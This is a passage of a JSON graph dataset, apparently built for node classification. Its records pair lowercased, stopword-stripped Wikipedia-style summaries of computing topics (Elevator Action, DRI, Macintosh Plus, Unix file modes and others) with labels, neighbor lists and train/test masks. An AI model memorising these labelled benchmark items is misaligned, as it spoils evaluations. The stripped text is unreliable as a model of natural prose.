    "text": "Elevator_Action:elevator action player assumes role agent 17 codename otto secret agent unspecified organization government otto enters 30-story building roof level must work way basement collecting secret documents whose locations marked red doors along way must use building elevator escalator systems move floor floor avoid kill enemy agents trying stop picking documents otto escape basement drive away waiting car end level player controls consist four-position joystick separate buttons control jumping firing otto move left right jump duck fire three shots time pistol otto elevator player push send higher lower floor however otto duck long inside run jump across empty shaft long elevator ride roof control motion cross side player push make otto ride escalator otto tries leave building without collecting documents transported highest floor still unopened red door must work way back addition takes long clear level alarm sound enemy agents become aggressive elevators slower respond player joystick movements building contains section lights making harder see approaching enemies floors otto temporarily disable lights shooting one overhead fixtures otto kill enemy agents shooting jump-kicking close range dropping light fixture heads crushing elevator shot crushed falls open shaft player loses one life background music levels changes hidden time limit expires otto lands first building rooftop start game chopin piano sonata 2 popularly known funeral march briefly heard elevator action ported zx spectrum amstrad cpc msx commodore 64 nintendo entertainment system game boy sega sg-1000 game boy version includes ability acquire different weapons machine gun fires rapidly port planned atari 2600 never released prototype game published cge services corp. sold classic gaming expo 2001 elevator action returns called elevator action ii north america official sequel released arcades 1994 elevator action ex updated version game released game boy color 2000 elevator action old new update game boy advance published 2002 revealed aou 2009 elevator action death parade lightgun shooter uses elevator doors changing scenarios later remake game square enix titled elevator action deluxe released playstation network august 31 2011 game contains single player multiplayer modes well original arcade version elevator action included compilations taito legends taito legends power march 5 2007 nes port elevator action released wii virtual console also released wii u virtual console japan",
    "neighbors": [
      2436,
      8709,
      4043,
      8492,
      1773,
      9006,
      4690,
      6390,
      9501,
      5275,
      1693
    ],
    "mask": "None"
  },
  {
    "node_id": 4895,
    "label": 4,
    "text": "Dual-homed:dual-homed dual-homed dual-homing refer either ethernet device one network interface redundancy purposes firewall technology one firewall architectures implementing preventive security example dual-homed devices enthusiast computing motherboards incorporate dual ethernet network interface cards ethernet lans dual-homing network topology whereby networked device built one network interface interface port connected network one connection active time connection activated primary connection fails traffic quickly rerouted backup connection event link failure feature designed provide telecommunications grade reliability redundancy ethernet networks multihoming general category referring device one network connection firewall dual-homing provides first-line defense protection technology keeping untrusted bodies compromising information security violating trusted network space dual-homed host dual-homed gateway system fitted two network interfaces nics sits untrusted network like internet trusted network corporate network provide secure access dual-homed general term proxies gateways firewalls server provides secured applications services directly untrusted network dual-homed hosts seen special case bastion hosts multi-homed hosts fall category application-based firewalls dual-homed hosts act firewalls provided forward ip datagrams unconditionally firewall architectures include network-layer firewall types screening router screened-host screened subnet",
    "neighbors": [
      8998,
      6024,
      11502,
      7151,
      4435,
      4725,
      6262,
      3930,
      3323,
      4287
    ],
    "mask": "Test"
  },
  {
    "node_id": 4896,
    "label": 5,
    "text": "PAROLI:paroli paroli proprietary protocol used inside multi-shelf carrier routing system cisco stands parallel optical link used connect line-cards so-called line-card chassis switching fabric switch-fabric chassis traffic kinds chassis comparable data flows backplane single-shelf system required bandwidth high need reliability shelves interconnected using several fibre optic cables protocol/feature used multi-shelf cisco-crs systems find ios xr special high performance version cisco ios basically two types multi-shelf crs systems second option allows fault-tolerant system crs system although single shelf switch-fabric allows redundancy levels power fans management-cards switch-cards etc multi-shelf system based two switch-fabric cards least two line-card chassis continue run even one switch-fabric shelves completely four scc/2 lcc also gives optimal availability reliability without loss throughput case switch fabric module fails although different shelves multi-shelf routing system often placed directly next paroli system allows distance shelves want place different shelves different rooms e.g system two switch-fabris chassis one chassis 50 line-card chassis dataroom 1 rest system room 2 even fire one room system continue work possible long length fibre-optic canles n't exceed 100 meters 328 feet also allow move individual shelves system traffic coming multi-shelf crs system come via interface line card line-card shelf traffic sent switch-fabric shelf packet processed based destination course system-configuration data sent outgoing interface line-card line-card shelf inter shelf communication links therefore process kind data-volumes backplane normally carry single-shelf router allow speeds via external fibre optic cabling cisco designed special modules make possible multi-shelf system need three kind connections line-card chassis switch-fabric chassis management alarm external clock cabling allow management different shelves system different type management clock signalling options least one management cabling required general rp ethernet connection controller cabling cisco created special module use fabric card chassis 22 port shelf controller gigabit ethernet module sc-ge-22 lcc use two ethernet interfaces provided two rp chassis single sfc two lcc install sc-ge-22 modules single sfc interface rp connect twice single sfc 2 x 2 setup one ge port rp connects one sfc ge port connects sfc four sfc setup first rp connects sfc 1 3 rp shelf connects sfc 2 4 allow redundancy connect ethernetport0 interface rp port first fc-fe-22 interface 1 second sc-fe-22 allow communication two sc-fe-22 modules creating mesh-network connect port 22 sc-fe-22 dual sfc sc-fe-22 direct full mesh link 3 sc-fe-22 4 sfc system also create full-mesh network fc-fe-22 modules cabling means one sfc two lcc need 8+1 ethernet cables network control dual sfc need 14 cables 8xsc-lc 6 lcc mesh 4 sfc-2 lcc need 8 lc cables 28 sfc-sfc mesh cables finally need fabric cabling carry actual data payload line card chassis switch fabric chassis interconnection system uses 8 fabric planes numbered 0 7 combination uses 3 components stages packet arrives via interface linecard lcc ingress fcc stage 1 goes switch-fabric stage 2 destination line-card stage 3 .it course possible linecard ingress resides shelf egress line card 3 stage model used lcc use stage 1 3 cards s13 cards sfc stage 2 cards s2 single sfc setup 8 s2 cards reside single sfc multi sfc setupthe s2 cards distributed sfc communication based two line-card chassis need 72 fibres 3 s1,2,3 x 8 planes x 3 2xlcc+1fcc even one sfc still use 72 cables two sfc setup 50 fibres lcc connect sfc1 50 sfc2 similar 4 node system cables ordered lengths 10–100 meters steps 5 meters come sets 24 thus interconnect system need 3 sets required length future configurations two lcc supported currently multi-shelf configuration supports two line card chassis 1,2 3 switch fabric chassis",
    "neighbors": [
      4896,
      6834
    ],
    "mask": "Test"
  },
  {
    "node_id": 4897,
    "label": 3,
    "text": "QUICC:quicc quicc abbreviation quad integrated communications controller original quicc 68k-based motorola 68360 followed powerpc-based powerquicc powerquicc ii powerquicc ii+ powerquicc iii early chips used separate risc engine control serial interfaces enhancing performance slower speed designs pq2+ pq3 designs first family offer gigabit ethernet speeds using conventional ethernet controllers without need risc co-processor exceptions 832x bridge chips chips many integrated devices/controllers directly targeted telecom industry still used applications well technology backbone many motorola cellular base stations pq2+ chips moved directions well many designs sata controllers san based applications networking always strength every current freescale pq cpu/board comes working linux environment freescale continues offer mqx true rtos ppc growing basis",
    "neighbors": [
      869,
      11447,
      7065,
      3319,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 4898,
    "label": 4,
    "text": "John_B._Ackerman:john b. ackerman john bevier ackerman april 29 1909 – june 13 1981 second vice director national security agency united states major general united states air force",
    "neighbors": [
      289,
      7137,
      10305,
      11302,
      327,
      266,
      6668,
      365,
      9357,
      4719,
      7887,
      2897,
      1714,
      10832,
      4566,
      2712,
      6749
    ],
    "mask": "None"
  },
  {
    "node_id": 4899,
    "label": 0,
    "text": "Bibliotheca_Polyglotta:bibliotheca polyglotta bibliotheca polyglotta norwegian database multilingualism project french language science per global history university oslo aim project according pages producing web corpus buddhist texts using multilingual lexicography generally texts used study sanskrit chinese tibetan",
    "neighbors": [
      2901
    ],
    "mask": "Test"
  },
  {
    "node_id": 4900,
    "label": 9,
    "text": "Work_Flow_Language:work flow language work flow language wfl wiffle process control language burroughs large systems including unisys clearpath/mcp series operating system master control program developed soon b5000 1961 wfl clearpath equivalent job control language jcl ibm mainframes shell scripts unix-like operating systems unlike jcl wfl high-level structured language complete subroutines procedures functions arguments high-level program control flow instructions wfl programs compiled binary executables like mcp subject wfl used high-level system operations running tasks moving copying files providing high-level recoverability thus general purpose language would use general computations open close files check attributes example however read change contents wfl – general purpose language invoke task wfl wfl high-level algol-like readable syntax none low-level assembler-like commands jcl like codice_1 etc order connect hardware devices open files programs wfl constructs deal high-level abstractions tasks files parameters also real hll parameters 1 2 ... style position parameters shell scripts wfl also instruction block command used give operators instructions needed run current job instructions displayed using 'ib operator command wfl compiled language medium systems os interfaces may change release release medium systems wfl code included copy source object file upon executing wfl job would check determine object compatible os version would trigger recompile object using source embedded object code",
    "neighbors": [
      512,
      1952,
      8001,
      1702,
      7983,
      2002,
      5714,
      9780,
      5397,
      10387,
      3323
    ],
    "mask": "None"
  },
  {
    "node_id": 4901,
    "label": 7,
    "text": "Google_Fusion_Tables:google fusion tables google fusion tables simply fusion tables web service provided google data management fusion tables used gathering visualising sharing data tables data stored multiple tables internet users view download website launched june 2009 announced alon halevy rebecca shapley web service provides means visualizing data pie charts bar charts lineplots scatterplots timelines geographical maps data exported comma-separated values file format service described scientific paper 2010 size uploaded data set limited 250 mb total limit 1 gb per user 2011 upgrade google docs fusion tables became default feature title tables beta december 2018 google announced would retire fusion tables 3 december 2019",
    "neighbors": [
      4096,
      1409,
      4995,
      5892,
      8455,
      7816,
      9610,
      5262,
      8719,
      3600,
      6800,
      5522,
      1427,
      5524,
      7700,
      10645,
      11408,
      10009,
      8858,
      1435,
      9244,
      10393,
      798,
      10525,
      288,
      7841,
      2978,
      10020,
      1959,
      3499,
      7595,
      10284,
      10286,
      3633,
      1203,
      5431,
      2875,
      10045,
      7359,
      196,
      3269,
      3782,
      11590,
      11592,
      4683,
      4044,
      10445,
      9039,
      3664,
      3409,
      4048,
      3795,
      11343,
      1240,
      7548,
      8285,
      8413,
      6367,
      9949,
      2658,
      6632,
      5483,
      236,
      5100,
      9712,
      9970,
      8821,
      7926,
      3836
    ],
    "mask": "None"
  },
  {
    "node_id": 4902,
    "label": 2,
    "text": "Direct_Rendering_Infrastructure:direct rendering infrastructure direct rendering infrastructure dri framework allowing direct access graphics hardware x window system safe efficient way main use dri provide hardware acceleration mesa implementation opengl dri also adapted provide opengl acceleration framebuffer console without display server running dri implementation scattered x server associated client libraries mesa 3d direct rendering manager kernel subsystem source code free software classic x window system architecture x server process exclusive access graphics hardware therefore one actual rendering framebuffer x clients communicate x server dispatch rendering commands commands hardware independent meaning x11 protocol provides api abstracts graphics device x clients n't need know worry specifics underlying hardware hardware specific code lives inside device dependent x part x server manages type video card graphics adapter also often called video graphics driver rise 3d rendering shown limits architecture 3d graphics applications tend produce large amounts commands data must dispatched x server rendering amount inter-process communication ipc x client x server increased 3d rendering performance suffered point x driver developers concluded order take advantage 3d hardware capabilities latest graphics cards new ipc-less architecture required x clients direct access graphics hardware rather relying third party process saving ipc overhead approach called direct rendering opposed indirect rendering provided classical x architecture direct rendering infrastructure initially developed allow x client perform 3d rendering using direct rendering approach nothing prevents dri used implement accelerated 2d direct rendering within x client simply one need 2d indirect rendering performance good enough basic architecture direct rendering infrastructure involves three main components original dri architecture due memory size video cards time single instance screen front buffer back buffer also ancillary depth buffer stencil buffer shared dri clients x server rendered directly onto back buffer swapped front buffer vertical blanking interval time order render back buffer dri process ensure rendering clipped area reserved window synchronization x server done signals shared memory buffer called sarea access drm device exclusive dri client lock beginning rendering operation users device —including x server— blocked meantime wait lock released end current rendering operation even would n't conflict operations another drawback operations n't retain memory allocations current dri process released lock device data uploaded graphics memory textures lost upcoming operations causing significant impact graphics performance nowadays dri1 considered completely obsolete must used due increasing popularity compositing window managers like compiz direct rendering infrastructure redesigned x clients could also support redirection offscreen pixmaps direct rendering regular x clients already respected redirection separate pixmap provided x server render target —the so-called offscreen pixmap— dri clients continued rendering directly shared backbuffer effectively bypassing compositing window manager ultimate solution change way dri handled render buffers led completely different dri extension new set operations also major changes direct rendering manager new extension named dri2 although later version different extension even compatible original dri —in fact coexisted within x server long time dri2 instead single shared back buffer every dri client gets private back buffer —along associated depth stencil buffers— render window content using hardware acceleration dri client swaps false front buffer used compositing window manager one sources compose build final screen back buffer swapped vblank interval real front buffer handle new buffers direct rendering manager incorporate new functionality specifically graphics memory manager dri2 initially developed using experimental ttm memory manager later rewritten use gem chosen definitive drm memory manager new dri2 internal buffer management model also solved two major performance bottlenecks present original dri implementation dri2 allocation private offscreen buffers back buffer fake front buffer depth buffer stencil buffer ... window done x server dri clients retrieve buffers rendering window calling operations available dri2 extension internally dri2 uses gem names —a type global handle provided gem api allows two processes accessing drm device refer buffer— passing around references buffers thought x11 protocol reason x server charge buffer allocation render buffers window glx extension allows multiple x clients opengl rendering cooperatively window way x server manages whole lifecycle render buffers along entire rendering process knows safely recycle discard window resize performed x server also responsible allocating new render buffers matching new window size notifying change dri client rendering window using invalidatebuffers event would retrieve gem names new buffers dri2 extension provides core operations dri clients finding drm device driver use getting authenticated x server order able use rendering buffer facilities drm device presentation rendered buffers screen performed using requests used copy fake front buffer real front buffer n't provide synchronization vertical blanking interval cause tearing hand performs vblank-synchronized swap back front buffer supported buffers size copy blit otherwise although dri2 significant improvement original dri new extension also introduced new issues 2013 third iteration direct rendering infrastructure known dri3 developed order fix issues main differences dri3 compared dri2 buffer allocation client side breaks glx assumptions sense longer possible multiple glx applications render cooperatively window plus side fact dri client charge buffers throughout lifetime brings many advantages example easy dri3 client ensure size render buffers always match current size window thereby eliminate artifacts due lack synchronization buffer sizes client server plagued window resizing dri2 better performance also achieved dri3 clients save extra round trip waiting x server send render buffers dri3 clients especially compositor window managers take advantage keeping older buffers previous frames reusing basis render damaged parts window another performance optimization dri3 extension longer needs modified support new particular buffer formats since handled directly dri client driver drm kernel driver use file descriptors hand allows kernel perform safe cleanup unused gem buffer object —one reference technically dri3 consists two different extensions dri3 extension present extension main purpose dri3 extension implement mechanism share direct rendered buffers dri clients x server dri clients allocate use gem buffers objects rendering targets x server represents render buffers using type x11 object called pixmap dri3 provides two operations one create pixmap x server space gem buffer object dri client space reverse get gem buffer object x pixmap dri3 operations gem buffer objects passed dma-buf file descriptors instead gem names dri3 also provides way share synchronization objects dri client x server allowing serialized access shared buffer unlike dri2 initial operation —the first every dri client must request know drm device use— returns already open file descriptor device node instead device node filename required authentication procedure already performed advance x server dri3 provides mechanism show rendered buffers screen relies another extension present extension present named main task present buffers screen meaning handles update framebuffer using contents rendered buffers delivered client applications screen updates done proper time normally vblank interval order avoid display artifacts tearing present also handles synchronization screen updates vblank interval also keeps x client informed instant buffer really shown screen using events client synchronize rendering process current screen refresh rate present accepts x pixmap source screen update since pixmaps standard x objects present used dri3 clients performing direct rendering also x client rendering pixmap means example existing non-gl based gtk+ qt applications used double buffered pixmap rendering using xrender present extension also used applications achieve efficient non-tearing screen updates reason present developed separate standalone extension instead part dri3 apart allowing non-gl x clients synchronize vblank present brings advantages dri3 graphics performance better present efficient dri2 swapping buffers number opengl extensions n't available dri2 supported based new features provided present present provides two main operations x clients update region window using part contents pixmap set type presentation events related certain window client wants notified three presentation events window notify x client ongoing presentation operation —normally call — completed pixmap used operation ready reused window configuration —mostly window size— changes whether operation performs direct copy blit onto front buffer swap entire back buffer front buffer internal detail present extension implementation instead explicit choice x client dri2 several open source dri drivers written including ones ati mach64 ati rage128 ati radeon 3dfx voodoo3 voodoo5 matrox g200 g400 sis 300-series intel i810 i965 s3 savage via unichrome graphics chipsets nouveau nvidia graphics vendors written closed-source dri drivers including ati kyro various versions dri implemented various operating systems amongst others linux kernel freebsd netbsd openbsd opensolaris project started jens owen kevin e. martin precision insight funded silicon graphics red hat first made widely available part xfree86 4.0 part x.org server currently maintained free software community work dri2 started 2007 x developers summit kristian høgsberg proposal høgsberg wrote new dri2 extension modifications mesa glx march 2008 dri2 mostly done could n't make x.org server version 1.5 wait version 1.6 february 2009 dri2 extension officially included x11r7.5 release october 2009 first public version dri2 protocol 2.0 announced april 2009 since several revisions recent version 2.8 july 2012 due several limitations dri2 new extension called dri-next proposed keith packard eric anholt x.org developer conference 2012 extension proposed dri3000 linux.conf.au 2013 dri3 present extensions developed 2013 merged x.org server 1.15 release december 2013 first version dri3 protocol 1.0 released november 2013",
    "neighbors": [
      9604,
      2955,
      7309,
      7442,
      6813,
      10016,
      10658,
      6694,
      2730,
      3883,
      8621,
      7983,
      1842,
      5171,
      6069,
      823,
      11322,
      700,
      10176,
      10051,
      8266,
      3033,
      3162,
      10971,
      9054,
      9567,
      11487,
      11363,
      8685,
      9455,
      2804,
      8438,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 4903,
    "label": 4,
    "text": "Eva_Galperin:eva galperin eva galperin director cybersecurity electronic frontier foundation eff technical advisor freedom press foundation noted extensive work protecting global privacy free speech research malware nation-state spyware galperin became interested computers early age father computer security specialist 12 created desktop unix/solaris computer became active usenet discussion areas science fiction novels playing interactive text games later became active web development attended college san francisco state university political science international relations working unix system administrator various companies silicon valley galperin joined eff 2007 prior eff worked center us-china policy studies helped organize conferences researched chinese energy policy eff led threat lab project promoted eff director cybersecurity 2017 since 2018 focused eradication stalkerware spyware used domestic abuse industry working victims stalkerwares malicious applications marketed abusive spouses overbearing parents stalkers installed secretly mobile devices allowing owners monitor targets activities april 2019 convinced anti-virus provider kaspersky lab begin explicitly alerting users security threats upon detection stalkerware company android product also asked apple allow antivirus applications marketplace like kaspersky alert users mobile devices jailbroken rooted galperin stated due competition cybersecurity companies prompted follow suit meet heightened standard also called u.s. state federal officials arrest prosecute executives companies developing selling stalkerwares charges hacking",
    "neighbors": [
      7809,
      2634,
      9227,
      8172,
      5492,
      3350,
      10392,
      7515,
      3996
    ],
    "mask": "Test"
  },
  {
    "node_id": 4904,
    "label": 4,
    "text": "UK_Cyber_Security_Forum:uk cyber security forum uk cyber security forum social enterprise spanning united kingdom representing small medium-sized enterprises smes uk cyber sector divided 20 regional cyber clusters provide free membership events members forms part uk cyber security community forum praised uk government helping address cyber skills gap faced u.k concept providing regional cyber security clusters later supported laid u.k government cyber security strategy late 2014 national news reported effectiveness forum especially terms aiding collaboration uk cyber companies considerable coverage certain cyber clusters london cyber cluster featured heavily media currently 20 official cyber clusters u.k supported u.k government",
    "neighbors": [
      6648,
      2558,
      10823
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4905,
    "label": 2,
    "text": "SubOS:subos computing subos may mean several related concepts",
    "neighbors": [
      4972
    ],
    "mask": "None"
  },
  {
    "node_id": 4906,
    "label": 2,
    "text": "WebSphere_Application_Server_for_z/OS:websphere application server z/os ibm websphere application server z/os one platform implementations ibm websphere application server family latest version version 9.0 open standard interfaces supported common across platforms provided version release levels aligned however functional implementation open standard specification line differs platforms allows specific attributes platform exploited without jeopardizing common programming interface specification level websphere application server z/os v7 product code directly exploit following attributes platform version 7.0 websphere application server z/os provides five functions informally known zdiff functions represent specific exploitation z/os platform functions websphere application server z/os v8 introduced ability configure application server behavior request level rather server level function built upon existing wlm classification file used assign wlm transaction classes identified requests v8 provided additional xml tags assign server behavior requests identified xml following xml tags apply different behavior may v8 apply identified individual requests websphere application server version 8.5 announced april 24 2012 component v8.5 liberty profile runtime model composable web container server runtime dynamic update capabilities liberty profile z/os several extensions designed take advantage specific z/os platform functions extensions br",
    "neighbors": [
      4913,
      2168,
      7162,
      3323,
      3966
    ],
    "mask": "Test"
  },
  {
    "node_id": 4907,
    "label": 6,
    "text": "Modes_(Unix):modes unix modes file system permissions given user group others classes access files unix shown listing files long format access control lists use using getfacl modes changed chmod traditional unix permissions setfacl access control lists traditional unix permissions symbolic mode composed three components combined form single string text references classes used distinguish users permissions apply references specified defaults except references explicitly specified final outcome masked umask value references represented one following letters chmod program uses operator specify modes file adjusted following operators accepted modes indicate permissions granted taken away specified classes three basic modes correspond basic permissions combination three components produces string understood chmod command multiple changes specified separating multiple symbolic modes commas example following command would used add read write permissions user group classes file directory named sample command removes permissions allowing one read write execute file named sample following command changes permissions user group read execute write permission sample",
    "neighbors": [
      5120,
      6669,
      3598,
      10257,
      6677,
      5142,
      8214,
      9762,
      5158,
      11323,
      8772,
      4708,
      9836,
      7789,
      9333,
      6263,
      9335,
      9343,
      7818,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      7344,
      2230,
      5816,
      1212,
      8380,
      10951,
      9420,
      3795,
      4819,
      8404,
      728,
      8410,
      6365,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      3328,
      11012,
      2314,
      8461,
      6416,
      6935,
      11033,
      287,
      1825,
      6434,
      5413,
      3368,
      9004,
      302,
      6961,
      1336,
      3909,
      2378,
      4431,
      346,
      2395,
      2397,
      10596,
      5492,
      6519,
      376,
      11128,
      890,
      7554,
      8075,
      11675,
      414,
      2974,
      7070,
      4012,
      1454,
      6062,
      8114,
      7603,
      1464,
      1978,
      8643,
      7126,
      1509,
      9189,
      11256,
      3582
    ],
    "mask": "Test"
  },
  {
    "node_id": 4908,
    "label": 2,
    "text": "Nintendo_Switch_system_software:nintendo switch system software nintendo switch system software updatable firmware operating system used nintendo switch video game console nintendo released limited information switch internals public computer security researchers well developers nintendo 3ds emulator citra analyzed operating system found operating system internal name horizon evolution nintendo 3ds system software implements microkernel architecture drivers run userspace including nvidia driver security researchers described “ kind similar linux driver ” graphics driver features undocumented thin api layer called nvn “ kind like vulkan ” userspace processes use address space layout randomization sandboxed according nintendo switch system software licensing information code freebsd kernel utilized horizon horizon utilizes several components android stagefright multimedia framework according citra authors – also begun develop switch emulator called yuzu – “ nintendo re-purposed android graphics stack used switch rendering. ” rendering web content done via webkit although end-user web browser available console thus far webkit applet still accessible connecting network requires web login webkit applet also used several operating system functions nintendo eshop unlike previous consoles nintendo purposefully designed system software minimalist possible home menu running 200 kilobytes minimalism meant improve system performance launch games faster nintendo switch home screen battery internet time information top right corner grid showing software system downloaded physical underneath shortcuts os functions nintendo eshop settings sleep mode button news function nintendo switch software allows users read gaming news advertisements provided nintendo third-party developers news also displayed system locked news interface originally available 1.0.0 version software however new headlines transmitted 2.0.0 update released 3.0.0 update revamped news system adding multiple news channels different games users subscribe news headlines appear depend channels subscribed 4.0.0 update improved news screen updating layout nintendo eshop option home menu opens webkit-based interface allows games purchased downloaded nintendo eshop album stores captured screenshots videos pressing capture button controller supported software save screenshot either microsd card system memory album allows users view screenshots taken screenshots edited adding text shared facebook twitter addition supported games holding capture button briefly save last 30 seconds video album trimmed posted online 2.0.0 update added ability post screenshots facebook twitter within system ui making easier share screenshots 4.0.0 update added support saving 30 second videos compatible games controllers menu allows controllers paired disconnected reconnected 3.0.0 update added find controllers option allows nearby controllers paired remotely turned vibrated help find lost controllers settings option allows system settings changed includes functionality creating miis initial version system software nintendo switch launch day consoles updated day one patch 3 march 2017 console launch date update added online features previously missing original software official launch date notable features update access nintendo eshop well ability add friends friends list similar nintendo 3ds october 17th 2018 custom firmware named atmosphère first released many different custom firmwares system two popular reinx sx os",
    "neighbors": [
      7552,
      5506,
      1927,
      4745,
      10761,
      4364,
      2061,
      9743,
      274,
      7187,
      8725,
      9625,
      1946,
      4636,
      5534,
      10016,
      1316,
      2212,
      10535,
      1067,
      684,
      1839,
      7983,
      11698,
      11573,
      1718,
      1080,
      5177,
      5819,
      9151,
      9153,
      3651,
      7748,
      10436,
      11459,
      9927,
      9033,
      8266,
      8395,
      7249,
      850,
      6486,
      10455,
      6361,
      9306,
      6491,
      10202,
      607,
      3551,
      7521,
      1891,
      998,
      487,
      9320,
      873,
      4073,
      4972,
      9452,
      8316,
      633,
      3058,
      5363,
      7027,
      2421,
      9201,
      9844,
      2424,
      1273,
      1148,
      8829,
      9343
    ],
    "mask": "Test"
  },
  {
    "node_id": 4909,
    "label": 3,
    "text": "Instruction_window:instruction window instruction window computer architecture refers set instructions execute out-of-order speculative processor particular conventional design instruction window consists instructions re-order buffer rob processor instruction within instruction window executed operands ready out-of-order processors derive name may occur out-of-order operands younger instruction ready older instruction instruction window finite size new instructions enter window usually called dispatch allocate instructions leave window usually called retire commit instructions enter leave instruction window program order instruction leave window oldest instruction window completed hence instruction window seen sliding window instructions become out-of-order execution within window speculative i.e. side-effects applied outside cpu committed order support asynchronous exception handling like interrupts paradigm also known restricted dataflow instructions within window execute dataflow order necessarily program order window occurs restricted finite size instruction window distinct pipelining instructions in-order pipeline instruction window conventionally understood sense execute order respect one another out-of-order processors usually built around pipelines many pipeline stages e.g. front-end instruction fetch decode stages considered part instruction window",
    "neighbors": [
      6926,
      785,
      7313,
      7699,
      6815,
      2210,
      5798,
      9126,
      2345,
      7218,
      10675,
      10746,
      5948,
      4286,
      2113,
      8514,
      5956,
      4423,
      1480,
      7497,
      330,
      1866,
      9932,
      5457,
      4308,
      2008,
      2264,
      2394,
      731,
      2140,
      4194,
      11618,
      5223,
      2536,
      8810,
      4205,
      8815,
      6774,
      7802,
      508,
      6909,
      8447
    ],
    "mask": "Train"
  },
  {
    "node_id": 4910,
    "label": 3,
    "text": "Macintosh_Plus:macintosh plus macintosh plus computer third model macintosh line introduced january 16 1986 two years original macintosh little year macintosh 512k price tag us 2599 evolutionary improvement 512k shipped 1 mb ram standard expandable 4 mb external scsi peripheral bus among smaller improvements originally generally beige-colored case original macintosh pantone 453 1987 case color changed long-lived warm gray platinum color earliest macintosh model able run system 7 os bruce webster byte reported rumor december 1985 supposedly apple releasing big mac time column sees print said mac reportedly come 1 megabyte ram ... new 128k-byte rom ... double-sided 800k bytes disk drive standard mac box introduced macintosh plus first macintosh model include scsi port launched popularity external scsi devices macs including hard disks tape drives cd-rom drives printers zip drives even monitors scsi implementation plus engineered shortly initial scsi spec finalized 100 scsi-compliant scsi ports remained standard equipment macs introduction imac 1998 replaced apple legacy ports usb macintosh plus last classic mac phone cord-like port front unit keyboard well de-9 connector mouse models released macintosh plus would use adb ports mac plus first apple computer utilize user-upgradable simm memory modules instead single dip dram chips four simm slots provided computer shipped four 256k simms 1mb total ram replacing 1mb simms possible 4mb ram although 30-pin simms could support 16mb total ram mac plus motherboard 22 address lines connected 4mb maximum new -inch double-sided 800 kb floppy drive offering double capacity floppy disks previous macs along backward compatibility then-new drive controlled iwm chip previous models implementing variable speed gcr drive still completely incompatible pc drives 800 kb drive two read/write heads enabling simultaneously use sides floppy disk thereby double storage capacity like 400 kb drive companion macintosh 800k external drive available option however increased disk storage capacity combined 2-4x available ram external drive less necessity 128k 512k mac plus 128 kb rom motherboard double amount rom previous macs roms included software support scsi then-new 800 kb floppy drive hierarchical file system hfs uses true directory structure disks opposed earlier mfs macintosh file system files stored single directory one level pseudo-folders overlaid programmers fourth inside macintosh volume details use hfs rest mac plus new system software plus still include provision internal hard drive would nine months apple would offer scsi drive replacement slow hard disk 20 would well year apple would offer first internal hard disk drive macintosh compact mac plus 512×342 pixel monochrome display resolution 72 ppi identical previous macintosh models unlike earlier macs mac plus keyboard includes numeric keypad directional arrow keys previous macs one-button mouse fan making extremely quiet operation lack cooling fan mac plus led frequent problems overheating hardware malfunctions applications macpaint macwrite bundled mac plus august 1987 hypercard multifinder also bundled third-party software applications available included macdraw microsoft word excel powerpoint well aldus pagemaker microsoft excel powerpoint originally forethought actually developed released first macintosh similarly microsoft word 1 macintosh first time gui version software introduced personal computer platform time exclusive availability excel pagemaker macintosh noticeable drivers sales platform case design essentially identical original macintosh debuted beige labeled macintosh plus front macintosh plus 1 mb back denote 1 mb ram configuration shipped january 1987 transitioned apple long-lived platinum-gray color rest apple product line keyboard keycaps changed brown gray january 1988 reduced ram prices apple began shipping 2- 4- mb configurations rebranded simply macintosh plus among design changes included trademarked inlaid apple logo recessed port icons apple iic iigs essentially retained original design upgrade kit offered earlier macintosh 128k macintosh 512k/ enhanced includes new motherboard floppy disk drive rear case owner retained front case monitor analog board macintosh plus front upgraded units apple logo recessed bottom left hand corner front case however label back case reads macintosh plus 1mb new extended plus keyboard could also purchased unfortunately upgrade cost almost much new machine mac plus upgraded use third-party accelerators clipped soldered onto 68000 processor 32 mhz 68030 processor used 16 mb ram allows run mac os 7.6.1 program available called mini vmac emulate mac plus variety platforms including unix windows dos classic mac os macos pocket pc ios even nintendo ds although mac plus would become overshadowed two new macs macintosh se macintosh ii march 1987 remained production cheaper alternative introduction macintosh classic october 15 1990 made macintosh plus longest-produced macintosh ever sale 1,734 days 2nd generation mac pro introduced december 19 2013 surpassed record september 18 2018 continued supported versions classic mac os version 7.5.5 released 1996 additionally period general market relevance heavily discounted like 512k/512k e offered educational market badged macintosh plus ed due popularity long life introduction many features would become mainstays macintosh platform years plus common base model many software hardware products lack fan could cause life macintosh plus end early users power supply would heat solder joints inside would fracture causing many problems loss deflection monitor complete loss power early compact macs problem common yoke connector flyback transformer horizontal drive coupling capacitor fan also often added reduce heat machine upgraded full ram capacity 4 mb debut macintosh 128k macintosh plus various third-party cooling add-ons available help increase airflow unit apple reorganized compact macintosh case accommodate fan release macintosh se optionally included heat-generating internal hard disk plus went two rom revisions general market relevance initial rom replaced first two months serious bug prevented mac booting external scsi device powered second revision fixed problem scsi devices could send mac endless reset post",
    "neighbors": [
      1549,
      3598,
      7697,
      4114,
      6165,
      11289,
      7706,
      8222,
      1057,
      6183,
      1576,
      4139,
      7211,
      1592,
      8253,
      576,
      1090,
      4180,
      10838,
      10840,
      9312,
      7269,
      8806,
      6258,
      10357,
      4220,
      10365,
      10878,
      6783,
      4741,
      137,
      8842,
      6283,
      6797,
      7824,
      147,
      7830,
      6807,
      4258,
      7842,
      7844,
      7335,
      10424,
      7869,
      8893,
      8896,
      4807,
      4810,
      1744,
      3293,
      9952,
      6884,
      6377,
      1772,
      4844,
      1776,
      10481,
      1290,
      781,
      4879,
      784,
      2839,
      8480,
      11554,
      10023,
      7983,
      2874,
      11066,
      9022,
      10562,
      8525,
      2388,
      8534,
      3928,
      8540,
      6495,
      8544,
      11629,
      10608,
      5492,
      9084,
      7549,
      11649,
      3977,
      6539,
      10130,
      1428,
      3483,
      2979,
      11171,
      8109,
      8114,
      446,
      5058,
      10691,
      1482,
      6608,
      8662,
      9174,
      10199,
      8665,
      9182,
      2023,
      5616,
      6130,
      2551,
      2553,
      8700,
      1534
    ],
    "mask": "Test"
  },
  {
    "node_id": 4911,
    "label": 8,
    "text": "Yandex.Metrica:yandex.metrica yandex.metrica free web analytics service offered yandex tracks reports website traffic yandex launched service 2008 made public 2009 2019 yandex.metrica third widely used web analytics service web yandex.metrica uses simple javascript tag webmaster implements website tag collects audience traffic behaviour data website metrica also linked yandex.direct online advertising platform collect ads conversion rate",
